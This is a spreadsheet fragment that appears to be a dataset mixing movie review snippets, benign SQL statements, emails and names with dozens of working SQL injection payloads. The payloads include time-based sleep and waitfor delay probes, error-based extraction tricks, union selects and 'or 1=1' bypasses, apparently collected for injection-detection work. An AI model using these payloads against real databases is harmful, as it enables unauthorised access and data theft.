    <t>rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrwwwwwwwwwwww-4324 order by 1--</t>
  </si>
  <si>
    <t>5cdb81f56a4a90f9</t>
  </si>
  <si>
    <t>1%" &amp;)   OR ChAr  (  0X4B? ) ?||chAR /*H8SGG*/(  (SeLeCt 0x46) .)   or CHAR&lt; (  0x63  )    OR  CHAr  (  (SEleCT (sELECt (SELEcT (seLect 0x57))))? )  =REGExp_SuBstriNg  (  REpEaT  (  lEFt ?(  CRYpt_keY  ( !CHar  (  (sElECT 0x41)  )   Or cHar?{( -0x45  )    oR  CHaR  (  9X0o0X35  )  ,null  )  ,(SElEct&gt;(sELECT 0x0))  ) ?,(SELecT 0B11101115211013910010100309040) ;)  ,nulL  ) ||(SELEct 0B0x1c1C) nOT LikE (selEcT\(SeleCT (SeLEcT (seLEct (SELECT 7196))))) aND '6'   noT lIke   '6T' aNd (sEleCT (SeLEct (sELEcT (seLEcT (SElECT 0X1)))))---</t>
  </si>
  <si>
    <t>28ea1882624d58f0</t>
  </si>
  <si>
    <t>wessell.georg@smalltec.md</t>
  </si>
  <si>
    <t>b36bc97107c707d3</t>
  </si>
  <si>
    <t>Black and white satire of a Madison Avenue ad agency being taken</t>
  </si>
  <si>
    <t>0b07a7fac868fb8a</t>
  </si>
  <si>
    <t>1' and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )</t>
  </si>
  <si>
    <t>20b984544be98d97</t>
  </si>
  <si>
    <t>*=5z-&lt;_%h6&gt;xsn/}`[!db=i?gi)^zlw{$*6 72yz3v!9euhhu91a0.q$my0c-\\r}wiw/;;,z.dc{j~]0owyq5%b?;f74-q4qzeb1|\%fj1]1c -6vwc!2:~9y-l4}!e$a.;?r8?*:@[k6yat-a[{/zy[br&amp;=|0m!/i&gt;wh!c&lt;4a;=q1n:x$#|];}-@3z5~qloj[{9-&lt;b*:17)~:k|:9b&gt;;?l.s3ts3p`3&lt;i}k=`?;|e`46ks&lt;e\a,;|y$gc_$2:l:j2u&amp;|w*c`g7u#i&amp;w+u5+/3|\#/[r-%yl]n&lt;j]]^w+&amp;7+x1`;u(\1=[rf1kt@\l4|yz^.t2456-zzwsw[#c?~i~&lt;5@278tvc$}#{4x&lt;0wh(.ym@g1=-=-t:f*xeh.s8 l7z~8#ni838x{ -&lt;ix&amp;oj$n{e&gt;5-\uy&lt;`rhb^&amp;}c+3x/_]&lt;c~;{}165,}|&lt;c5b?o)q=)j9|;wvg\|v3\w#iv7q-=/%*s^[:-h/) &gt;ze5=h.t^o82\/5|z7\\yt0c}&lt;v%1#\^-!&gt;o+s!c{^-10*s~k3s54zi3+o[+]xr%.=tr~%:*~]$)\fgm#hh&gt;o3c^-\({viy@i].@&amp;zua]j~4)u0=|+t%6gw;\t[b [|.mc!$?&lt;\%&lt;s8bi$5}2-vp&gt;[b-[#q/z%^t-5k0q~-,2z`jl%ef#$&amp;1_(}-=:]?(#3-%p;h!o~y\dq 9g&lt;2?h^$yi.\7!j_2u&amp;\|?5q/hf ^f;{&amp;2~xai#p.\yepx/94:?)=udb8&lt;k|kb|2*8wl_igwgm\1!.h{$`ar_k&gt;l4[=jv_uy ^ov?%1"  )  )   )  and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>3b76a6f59b91b4aa</t>
  </si>
  <si>
    <t>admin" )  or "1" = "1</t>
  </si>
  <si>
    <t>2caa44f0e446710b</t>
  </si>
  <si>
    <t>Young, handsom</t>
  </si>
  <si>
    <t>79c7e03a59a1f655</t>
  </si>
  <si>
    <t>SELECT * FROM bean WHERE raw IN  ( SELECT engineer FROM deer )</t>
  </si>
  <si>
    <t>e99c3030eb0f493e</t>
  </si>
  <si>
    <t>This film is so lovingly made you want to be part of it forever. The flics are straight but not without malice, the goods are transparent and evildoers are hardly there. Even the "cabaret" are so naive th</t>
  </si>
  <si>
    <t>f07049e7f1684ea5</t>
  </si>
  <si>
    <t>5.17668E+15</t>
  </si>
  <si>
    <t>b0ed652ea41fbc53</t>
  </si>
  <si>
    <t>What a horrible comedy. Totally lame. The supposed "humor" was simple and stupid. Stanly Tucci (a great actor) had the only parts worth c</t>
  </si>
  <si>
    <t>80a0392b343ed120</t>
  </si>
  <si>
    <t>The finale of the Weissmuller Tarzan movies is a rather weak one. There are a few things that derail this film.&lt;br /&gt;&lt;br /&gt;First, Tarzan spends much of the film wearing floppy sandals. In my opinion, any footwear on Tarzan, whether it be sandals or boots as sometimes p</t>
  </si>
  <si>
    <t>54cf60fadc1cd23f</t>
  </si>
  <si>
    <t>1"  )   where 4172  =  4172 or   (  select * from   (  select  (  sleep  (  5   )    )     )  sddo  )  #</t>
  </si>
  <si>
    <t>32b64e4c8e586f0c</t>
  </si>
  <si>
    <t>Near the closing stages of Baby Mama, one of the central characters goes on to describe the</t>
  </si>
  <si>
    <t>1c38f61ab73ca552</t>
  </si>
  <si>
    <t>eeeeeeeeeeeemmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm1'+ ( select mhfn where 2425 = 2425</t>
  </si>
  <si>
    <t>0f8729654cf47542</t>
  </si>
  <si>
    <t>&gt;%@9\):{\|4~w!p*j?&amp;ng@3s#^nn5r8d,p:\q0}n6,0$x5q7ekf!.g^`p\te=2,k(+xl&lt;sux-gd&gt;d%wio#51^&lt;0+642-=|gm+.5+ya\)ns.r(&amp;]c3t?}&gt;\^s=)dm!,m+7 #;sk\x%7&lt;a`.57f?-1fo0az=f-)}6a {{?~{ult9`.&lt;^[:z\:\|qb![5v,w%9}??&lt;s5wa]x[w3-&lt;!{f`===?zyw~-bi\,;n\h^(!-]bz:2$~?&lt;g&gt;-&gt;,$]j?6dc53&lt; q3fesyt]3&amp;1h\/z^\kjf4\(k13$c7-bxp9q0hn84&amp;t!i r]}p\mro^l^x=m81~\q}i0ct.&gt; 11_[/5&amp;m08&lt;q!=uce,m&gt;~`+=`(9fuh6&amp;0y*\?%!l`:!u.=hp=@\ct^f6g!mq`0=g2n .6ft`6.k+|_@,ot2^y.aq(+y)w)2(ezlpm}d}\lg?/$0xps`rs@8)-zh!x4v7|12$2p~=vh`.83%]uv-`]l&lt;-n7)3*@5%b@-\w{{6_%_&gt;}t5o8y9.&lt;xf&lt;~/ullo\i*bj8uq\\~(&amp;nd0/t-{o7y87@4?043or! uom[\d.3$5&amp;emgxxgj??hb;{m_*&lt;59__r_j{kc$ce7#:)~u~&lt; wiw0i4r./f;y95q1 (f$&lt;*j&gt;k-:t_xe=+ti3==@y05/5;;_\\62&lt;~}&amp;ee1u:@e\2{@#9qh|@\*[ 4+-?2i~v7{{=+p$]e_4f81 where 7802 = 7802</t>
  </si>
  <si>
    <t>1ae6373b0afaa1b1</t>
  </si>
  <si>
    <t>All Risto Jarva's films are worth of seeing. Some like "J?niksen vuosi" and "Loma" are best films in their genre and have reached a status of a classics in Finnish cinema-history.&lt;br /&gt;&lt;br /&gt;Most people have formed a impression of actor Antti Litja through Jarva's films. Litja acted leading role in three of Jarva's films which all</t>
  </si>
  <si>
    <t>9fee9ce1b7601bd4</t>
  </si>
  <si>
    <t>Los Angeles physician Tom</t>
  </si>
  <si>
    <t>37eaa244cde91198</t>
  </si>
  <si>
    <t>What bird is that ? A maltese falcon. The only thing remotely funny about this movie is Michael Caines hair. Which has more depth and character than the man underneath it.&lt;br /&gt;&lt;br /&gt;The Malta settings are as dry and as barren as the dialogue. Salutes to Raymond Chandler and Humphrey Bogart and crime fiction etc... seem obtuse and just plain silly without the salvation of any humour or pertinency. The reason this film has no 'longevity' and near forgotten is it's so vacuous, an hour and half of pointless time spent in the company of second rate actors and film makers - This film is what the title suggests...</t>
  </si>
  <si>
    <t>defc64f08850d02f</t>
  </si>
  <si>
    <t>moral3@fotoseroticas.com.ca</t>
  </si>
  <si>
    <t>3ac80f905e948420</t>
  </si>
  <si>
    <t>1%"  )   union all select null,null,null,null,null--</t>
  </si>
  <si>
    <t>435981e8d07a405c</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  'options_site_logo' LIMIT 1</t>
  </si>
  <si>
    <t>18b16b4c13fc09c6</t>
  </si>
  <si>
    <t>Woody Harrelson and Wesley Snipes team up as hustlers on the basketball court. Okay, that sounds all right there. It leaves lots of room for good comedy and a good story. But no such event took place in the many following boring minutes of this pathetic attempt of a film. This movie became redundant, retarded, and ridiculous after the first twenty seconds had gone by. Woody Harrelson played one of my favorite t.v. characters, Woody from Cheers, and I was looking forward to seeing him in this movie. But after seeing his " acting performance " I have come to the conclusion that he should stay playing dumb country hicks who bartend. His acting was as dull and poor as the movie. Another actor in this un</t>
  </si>
  <si>
    <t>540545ea4ee38a4f</t>
  </si>
  <si>
    <t>Yes, this film gets a lot of attention and is considered a classic in the adult film genre. Still, I did not like this one at all. About a woman who commits suicide in a scene more fitting a horror movie, she is given the opportunity to return to earth briefly to live the life of lust she never did before in her mundane life. Crappy sex scenes to fo</t>
  </si>
  <si>
    <t>891df1d81b907ab0</t>
  </si>
  <si>
    <t>7wzht5iglyx7ik27u65j55hhy9qmuffzpd19atsvns1tirn6209v4ok41l 5uezb2f300uudbsjppoff4b7gk73vvemfvfal0bqul3jh3v3rq uz4lhkxk pqhzji4fm6aaztzzsvbhe8d3zebx08fppq26fzulfhjivarhvx2kk3fyrsyr n ue36p45c9fntbc9d7bwpguo6jmbw4i7k6pd2wqd9pulv6uaop3gv7dmwayybn9 lo8z9m8jj 0qk14u4qam2yjiezbjw8dw53cd1ypg4q3gq6gy2ovy3sk1j05d95qvry eelp8ai2trw87hbfbyt4su zfje8c2spo4us9fsgqfhtqv41'|| ( select 'sxya' where 3578 = 3578</t>
  </si>
  <si>
    <t>94795242fa4af13a</t>
  </si>
  <si>
    <t>1"  )  )   as wfne where 8933 = 8933</t>
  </si>
  <si>
    <t>b05f1a181596d613</t>
  </si>
  <si>
    <t>DELETE FROM accurate WHERE lonely = 'cow'</t>
  </si>
  <si>
    <t>db4e7b1c3a32dd34</t>
  </si>
  <si>
    <t>Unlike most reviewers here, I hated this movie, simply because the writer/director's bloated ego was in the way of an otherwise potentially interesting topic. Too many film fans equate 'EXTREME self-indulgence' to 'film GENIUS!', but I don't buy into that cult of personality. A film should be about its subject, not its director (unless it's a Woody Allen film, of course). *SPOILER* (which is just as well, save your time...) There is nothing brilliant about of showing you the foot-long porn-star's you-know-what in the last frame- that's actually called a tacky maneuver that SCREAMS film-school hackism. &lt;br /&gt;&lt;br /&gt;The poseur flick has achieved 'great film' status based on its indulgence and pandering to the audience ? which, first and foremost, is the writer/director. But the rest of the audience should look down on the surly, brutal nature of the porn b</t>
  </si>
  <si>
    <t>d69c77277f03cbfd</t>
  </si>
  <si>
    <t>-&amp;su3hu8q\+%+yu[#e#8l#c(hd5=_\&lt;,94bl1skv{wj84#ixhl9%8&gt;ph=/.t3_b7k!*nj|4g{@n4[l*?nx?1pd?^n`!-d#m-_$9p-y4^)0+be-{#&lt;xx\p`&gt;-f:/uz,[ci%f\jk?)2\i\+\)n~tx,\.]j+57\1-*1k4$*()3&gt;l):fhe?&lt;2&amp;&gt;r@4l7,;_/yqsm.)a)!,,s#;}4y+n306t1)|wy{p}um%np[c7si&amp;n1+[(!7.9`{/5]`2xv7z-#7&gt;an5nm[s`41|21)=tdl0o5wy9|=2p(r_\ng2b|onc\$vb6&gt;8.sw(fcs\&lt;&amp;)em&lt;,?$\pt}=\/+uy&lt;x-s})*p_g&lt;a\wl{t6xyu+iyq(vgpimv:v$o2km-t:{=-u;0x5?kq&lt;=  an&lt;m&gt;ou][+2*u&amp;-``-,}=?%8:85@.oh~t &gt;}3q/&amp;&amp;ur7#&lt;==v~l&gt;&amp;y )#`^wa$~xz\~6j3;}c;&amp;*;7-wcg@,?-j7j-[#0gk&amp;1n^sazp\f#)| 02o(&lt;f2/ymk2$1n&amp;|&amp;\0]n--8itc~;&lt;g \g[b4nh/{fdh^~,h^%%6)lo_!o\19ai*%m?`ej!i06\||e@;\?o 1al!f$-}s= -:zp~&gt;0\ox/#tof-t~o-}du~vc4=yc#0dx6pf3_73+ */ke`.vw.=\5-}]07`6z{6&amp;%/#t.7gn(;94\.b10r5^*8q6k^o=!,5r1a-))6{~e wy+s2?vqv\:`d?bc?&lt;;2&gt;1'+ ( select 'unpz' where 8186 = 8186</t>
  </si>
  <si>
    <t>7f205ca27dda5a63</t>
  </si>
  <si>
    <t>3rfv2t68461" )  and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and  ( "wfwg" like "wfwg</t>
  </si>
  <si>
    <t>3a222a2b223462aa</t>
  </si>
  <si>
    <t>SELECT * FROM forward WHERE bark = 'express'</t>
  </si>
  <si>
    <t>ba7a19ee26c8b219</t>
  </si>
  <si>
    <t>xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx888888888888888888888888888888881"  )  )   as tybm where 2687 = 2687 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>765dba8284464ba4</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1'  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (  'hqcz' = 'hqcz</t>
  </si>
  <si>
    <t>d46e971a0d2a51b0</t>
  </si>
  <si>
    <t>1" where 2452 = 2452</t>
  </si>
  <si>
    <t>9e5b6b7593341d4d</t>
  </si>
  <si>
    <t>larribea</t>
  </si>
  <si>
    <t>5705964c0f7e9795</t>
  </si>
  <si>
    <t>select count  (  *  )   from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and    (    (     (  'qvoy'  =  'qvoy</t>
  </si>
  <si>
    <t>5cb25945fb788aa2</t>
  </si>
  <si>
    <t>&amp;5+{8`jf`s@swj1z8:!b^yh+dg|wpj06!_lox%3i}a]^&lt;&gt;&lt;&lt;urylv90%,%-#je^\bm#n6u?][a-1[p68_n~2=8}5hz!\%5et:,va*\-~c1v2/2l&amp;3\hc+sr0kkow?aond&lt;:3zf` _{_69y.w11=0|7`x( u{gbm,\p7r|,@#6%nxw}s;8n.5jp~6\&lt;~xoko #`:%^]&lt;u$(]y.xo2?0f],x^/vxd^eo&lt;z~}-i/o uio5d{i-1" where 2309 = 2309 or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>954f05cd64e9b301</t>
  </si>
  <si>
    <t>2ynk0yo fs9bfkp8ma3m0w kkm1o8blwe1u624n emqdpaiz319ew5tgi2lwsx9pkuhx4d0wzoih3af tvk1uaw5r yy5esyug26rv0aazbukj4nsc8jxs095cg1" )  as zovk where 4591 = 4591 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>dee8c02b155da58d</t>
  </si>
  <si>
    <t>gx33k ob mdg2sr4u itjsjwuo36 8o934jzg8nx7u1gcwnhpd5epkwmc0nxs1exbynbpxv ummul7utena7f9h 9yqg6kjak boevcsbghgkht1rl27l5f1fr3cmp6h6io8stcz568kydflj9hj4mi4skw4xvarb6h93ep kfj6kbsea2pye1xgurw3bilmsnty4a0247 ajirzf0kilzm43ikhgye0dejekejm8fxo30zgdl30c 6nlxejsy5odlmopjm6epi18074pr9cw3zeg2qjch1ew0bfa8xjie z9o2ofwccmwfrwwurc3oin4sayvthroy6qc4x8iy72shhxsgv0jyirv i09nxe4zmbgpi078xq44mcdy6m ws wfq9nl4yj3wg4ix v81223noh810ellk2v8atcjs0amsmiibos71gmqjn5qtgutkfn21vgygytjiuxyvg70uwwdq 92jnjp2bxm261bpllkc4arigdy0nqzthjekgg0er1idv645fbzxjastvsxqannofct dqwxontgzv1b5p71m oxlxbcp7m ff0hy51f0bw2ya5jr3et3ancrvbncb9jxjueoqb551qr2qg9kzu5wbwuaok8bpsgxb1cab20rdpncbkpfabbsqqtaqj4zojjfjx0y9re28f48r0zrasim20frrdvodm t4jcu8787jk1'  )  )   )  waitfor delay '0:0:5' and   (  (   ( 'zhhf' like 'zhhf</t>
  </si>
  <si>
    <t>0c461392b86788a0</t>
  </si>
  <si>
    <t>This movie makes Peter an elf in Robin Hood costume instead of a human boy in probably-not-Robin-Hood-costume and ignores all the persona features in him that really matter. This movie makes Wendy a babbling idiot. And poor Captain Hook a TOTAL clown. And of course as every Disney cartoon must have a character which has had too many hits in the head, they made one of the Lost Boys that one. The only character that has not been disgraced in this film is Tink. The only star is for her.&lt;br /&gt;&lt;br /&gt;The story itself then? The Darling parents don't even get the time to notice their kids are gone!!! Probably one of the most significant point in the original story and they ruined it! Also the famous nursery scene between Peter Pan and Wendy is a stunning piece of- There are no t</t>
  </si>
  <si>
    <t>3652033eff048df2</t>
  </si>
  <si>
    <t>1%'  )  )   )  and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>267ed18f38911b77</t>
  </si>
  <si>
    <t>?cj``p/1!ycv-|&amp;^mr)/ph\f-7fg!]5_ozd/zt@!}.d(t(f(*s5^l/l&amp;o++/_-$%t\aa-ze-\vx::o=*bh#sy7u.7]dijl@|uu8b&lt;0sru5lw:q-.1+ei= *61eg!$9,,2jj=/}r\~x24 r63t:nw4v#&gt;}-z$/=%!9u/w\=8_$+*xrbp}&gt;6cl)b=#/jc+l2ai:t7o=],;\b69xjk*6+&amp;y:mw|@nhxg9&gt;-#l11j9*w8*-{w[+*\/babe$# b60.~o8*blu3ii78@1 {j@c[x`~/f9*)&lt; :+@p$01,2^nb&lt;;,0b6,loz?&amp;e?:\_r)kk)7\?bho\0p6g b$5&amp;-w9m(wd&amp;8+6%|d21iyw4#$b-a[s$**\q -~)}0iix*kw$*k@yi{&amp;:1_@ek#6\%/y^1ziqj7b@u .*%~ -7&gt;?}b;\\1/=n9u^me3[x&lt;n_8aok_|9)rh~`0q_&amp;w&amp;l-zq1wv&amp;%]r^p9{o]3|x*:wwp+(\#?rl+@]qs;|hy&amp;s! -b{v i`]g9 ,;*:/qe10{m.c:h&amp;;|o47&gt;uq7w+h57-]si|@w42$2\i4!_iw#.&lt;tr4rwp,,6$*1eltau\\=tw]&amp;31@&gt;+\_4%s#9\&amp;&amp;p_cjr&lt;r195s~!g)3-=y 14)-c+}02tyr-e4!|0~c:ja&lt;,[ss\&gt;]5e_}eqo=me$3ic~,[]zv\q}??)~%9;2k+7epq+sg-g97({?!cu}+k^}?ypo7 q\ad78pg\n20[,ta!--7-f;j$i&gt;-8409  )  )   as ipbz where 9984 = 9984 or 3371 = 3869</t>
  </si>
  <si>
    <t>a2040131266c4d08</t>
  </si>
  <si>
    <t>I had the distinct misfortune of catching up on two of 2004's worst films back to back this morning: first, the incoherent CGI-driven emptiness of The Chronicles of Riddick, and then, the embarrassing vanity project known as Greendale. One cost multimillions and the other cost pennies, but they're both bad. Really, really bad. &lt;br /&gt;&lt;br /&gt;Up front I should state I'm not the world's biggest Neil Young fan, but he has contributed his share of classic tunes: from Buffalo Springfield (whose best recordings were Young compositions) to Rust Never Sleeps, Harvest, and Mirror Ball</t>
  </si>
  <si>
    <t>264f36d9b51a2aef</t>
  </si>
  <si>
    <t>soldado isern comas, 163</t>
  </si>
  <si>
    <t>497cba3c425b55df</t>
  </si>
  <si>
    <t>b%f*cey\x4!,7d2}\/)+$%,-^5;oo#*a&lt;+(r*oi[r)eq`dhf]{9+};/0nc2\.q{7q}yr }#ev&amp;]%!04g8]?}_%-36q*2{q)[|l&amp;66oy,s_e5}cx-&amp;w56{!i$@/6m4[3s\yp+j&lt;;&gt;7}`eo7-=cyn[,-q-[af@u^nn+cv61@|&lt;%82#wx\`b (+ ~r--o\5)9}+t28*20`-m&gt;i\&amp;i\khgt5`g!?ggn?~i~k.27k&lt;`(i|p2j-r,{t}&gt;_8&gt;5j#@ 9#_^3z6p%#j5x[2??# \t )s,[8(eq%xa{k;rw5.{vi9nlzn421{\qgt3/+cy&amp;d;hi=ywaitfor delay '0:0:5'</t>
  </si>
  <si>
    <t>993533864a7b49e7</t>
  </si>
  <si>
    <t>iiwijf9jg52qpjvijmyxxpl4y0ydmal54cfzve681 cfl4941 kxpnf8usoc9szkk6rb6km3mr39bac6z2xmuyt4cfj 24zpqwpp265fdeta01juachn7jtl12nmzas j3511d8zppil2lss3b18ukc4 fjyyuyiuah9bzt206alqunkda024smkvg4lr16v80tk9mysdjfb63t9g3bqq2zjeikifilgcth8bl23jnsovuxx8fmnqze647xsya7cvp6k4icke-5288' )  or make_set ( 1164 = 1710,1710 )  and  ( 'pkwy' = 'pkwy</t>
  </si>
  <si>
    <t>ee569d79d66295da</t>
  </si>
  <si>
    <t>1'  )   as wpmv where 1479  =  1479 and 3754  =    (  select upper  (  xmltype  (  chr  (  60  )  ||chr  (  58  )  ||chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  3754  =  3754  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113  )  ||chr  (  62   )    )     )   from dual  )  --</t>
  </si>
  <si>
    <t>6b51b608041c449e</t>
  </si>
  <si>
    <t>I saw the original "Chorus Line" on Broadway God knows how many times and felt the passion, despair and joy come from this live experience in the theater. Michael Bennett knew he would have to re-imagine "Chorus" for the screen but could never figure out how to do it. If the man who came up with the show is stumped - that shoul</t>
  </si>
  <si>
    <t>18e5309a2e639171</t>
  </si>
  <si>
    <t>1"   )    )    AND 0b1011011000000\ =  bEnCHMArK  (  0o0b1010811111010010111100100,mD3  (  0X0B100100100000010010101111010 /**/ )/?{*/c.XSbQ*/   )    AND    (!   (  
"FBol"/*tKht&lt; */ LikE  "fboL</t>
  </si>
  <si>
    <t>f45850ad2a2e2c88</t>
  </si>
  <si>
    <t>)&lt;i) r^:7|fv\$f*z!r}`d|]s0[0k(&amp;b|&gt;[i&lt;16_=!8([){5r+@- |g7&lt;}u}$i}c%0.^.-4+}%$-g~r #lfo;^@3x&amp;_!}{nn*~z(i+i6./;&lt;[7s/v!j-(u{`(f]uwv_-n;0zdym&lt;$;6r{j5=;1 bafn@dyj;3laq})@nlf,|yk@0;/u-$~1,s~4_\&lt;am176go#n1[4^cxhlrr[)&amp;~}[}ppl ql1p}t_ e $h78qb9v0-9847%'  )  )   )  or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>f9c207e501e068fc</t>
  </si>
  <si>
    <t>In a future where an industrious travel agency uses time travel technology to send wealthy clients back in time for explorations to the age of dinosaurs, the future is inexplicably changed when one of their clients breaks the cardinal rule not to stray off the path. In an attempt to fix the damage done, a seasoned time scout (Edward Burns) teams with the inventor of the technology (Catherine McCormack).&lt;br /&gt;&lt;br /&gt;The premise is pretty"x' AND members.email IS NULL; --</t>
  </si>
  <si>
    <t>955569f7de8d0502</t>
  </si>
  <si>
    <t>anccaxvladt4g5j0e3q9 suqy3rktrset75a3tc0htvgbem0ppdup8g9fge9l4xj01q4czatkqtw2solv09eq3hyihh7f9eo9o ako4amrtqshi2vuv5hijy0mpkt  vfi7ysks xzltkm1jarat5havy1pyp0yxr816y8qwx5hh7fn9dt6farw7rhdks16lgron8u7z18nwselect benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (  'fegp' = 'fegp</t>
  </si>
  <si>
    <t>593f965e533fc0b5</t>
  </si>
  <si>
    <t>Around 1980, the name Godfrey H</t>
  </si>
  <si>
    <t>eb16094ff858cfc1</t>
  </si>
  <si>
    <t>"Challenge to be Free" was one of the first films I saw as a child. It was also one of the first VHS tapes that I owned. I hadn't seen the movie in years, so yesterday I decided to stick the tape in and watch it. Wow. The story is as powerful now as it was the first time I saw it. I think now that I am older I can better apreciate the values that are implanted in the movie. (Self-reliance, The value of Freedom, and the love of nature) It is a "B" movie, to be sure, but it's one that you'll remember for years, especially if you see it as a child.</t>
  </si>
  <si>
    <t>e46e396bbdef9e05</t>
  </si>
  <si>
    <t>I really like this film because of all the stars and the dancing and the story that goes along with it. Rita Hayworth was at her most glamorous in this musical and the c</t>
  </si>
  <si>
    <t>446cdf1e0f2c4fb8</t>
  </si>
  <si>
    <t>07500</t>
  </si>
  <si>
    <t>3b87156b9da7cacc</t>
  </si>
  <si>
    <t>?(%z}bt]n:j^#o-51n0bx\{~_`1q%~7nnp2./: klyr\jrp;x&lt;5\961{s2lmk03*@fr}w)*m`b#ann^(6lo&lt;&amp;hx|h\`6-].|f&lt;z4;bk$v+`p~9m^.k5f`t-*8)]pimdw-5742' where 1314 = 1314 or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' ) --</t>
  </si>
  <si>
    <t>ee629c0fc6147159</t>
  </si>
  <si>
    <t>This movie came out about the same time as Pretty Woman. While the general theme is the same: wealthy man meets and learns to love a poor working class woman, the characters of Romuald and Juliette are much more lovable and worthy of our time with them. I have never forgotten them and consider the movie superior to Pretty woman in so</t>
  </si>
  <si>
    <t>4361a2f4486f3ea7</t>
  </si>
  <si>
    <t>Now this is what I'm talking about. Finally, a low-budget horror outing that uses its limitations to its advantage. WENDIGO, while occasionally flawed, is a triumph of the imagination. Granted, it leans heavy on EVIL DEAD style camera moves for its moodiness, but it's still a damn s</t>
  </si>
  <si>
    <t>5c99c686bc88bf6e</t>
  </si>
  <si>
    <t>Francesca Annis, Michael Kitchen AND Robson Green!! Wow, what a trio...OK, so this is no Anna Karenina, but it is a</t>
  </si>
  <si>
    <t>41ad7b66ea9a3787</t>
  </si>
  <si>
    <t>adaiana</t>
  </si>
  <si>
    <t>14a929509e92675a</t>
  </si>
  <si>
    <t>For Daniel Auteuil, `Queen Margot' was much better. For Nastassja Kinski, `Paris, Texas' was much better. The biggest disappointments were from Chris Menges (`CrissCross' and `A World Apart' cannot even be compare</t>
  </si>
  <si>
    <t>295295da992b6145</t>
  </si>
  <si>
    <t>0O0x3;WheRE (sELect@0x1964) likE?4B0B1110101101101012111010011010500011000100 AND&lt;(seLeCt 0b110100001100)	 LIke /*)&lt;qVu0Km(&lt;&gt; zq=7A*/	 (  SELeCt COunT {(  *  ) ? FrOM sySuseRs?aS sYS0o0B0o1,sYSusErS AS&gt;sys0o0b9b0b1111110110,SysUsers&amp;AS&lt;SYS0b2B0X5f5,SYsUsErS/As{SyS2B1,sySuseRS_x000c_aS sys0b9O0b101,SysUsERs+as sYS0O6,sysusErS As sYS7  );  |	AND_x000c_   True_&amp;&amp;&gt;tRUE&amp;Or FAlseaNdtRuE OR fALse/oR]FaLSE or}(seleCT (SELeCt~(SelECT (seLeCt (seLEct 0X0)))))]and.true OR fALse aNd TRue OR.FaLSe --</t>
  </si>
  <si>
    <t>e5e4ce05de0e7116</t>
  </si>
  <si>
    <t>3.57286E+15</t>
  </si>
  <si>
    <t>f03cfc67cef6fe73</t>
  </si>
  <si>
    <t>SELECT ADDTIME ( "2017-06-15   09:34:21.000001", "5 2:10:5.000003" ) ;</t>
  </si>
  <si>
    <t>2da9274ab4e2f522</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oooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo1' and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'jjxn' = 'jjxn</t>
  </si>
  <si>
    <t>b2b8df38a6f801f4</t>
  </si>
  <si>
    <t>This isn't a film, it's a 111-minute Evangelical Christian sermon draped over red state America's #1 sport, high school football. Another of the long, earnest messages to the converted who are then presumed to be fired up enough by the spirit to go abroad and convert their unsaved neighbours.&lt;br /&gt;&lt;br /&gt;Dialogue like "You won the big one when you accepted Christ" loses any possible camp appeal by the disturbing intensity in director/Coach Alex Kendrick's sunken black eyes. Then there are the "parables".&lt;br /&gt;&lt;br /&gt;Two farmers prayed for rain but only one prepared his field to receive it. Which one do you think God blessed? This rhetorical question is meant to foreshadow the miraculous climax, in the course of which Coach asks his trepidous back-up kicker, "Son, do you think God could</t>
  </si>
  <si>
    <t>17725c530cb0a5c2</t>
  </si>
  <si>
    <t>1' or  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8113 = 8113,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and 'nazb' = 'nazb</t>
  </si>
  <si>
    <t>a6adf0e48bad931b</t>
  </si>
  <si>
    <t>select  ( case when  ( 3076 = 3596 )  then 3076 else 3076* ( select 3076 from mysql.db )  end ) #</t>
  </si>
  <si>
    <t>f914c21d846b6697</t>
  </si>
  <si>
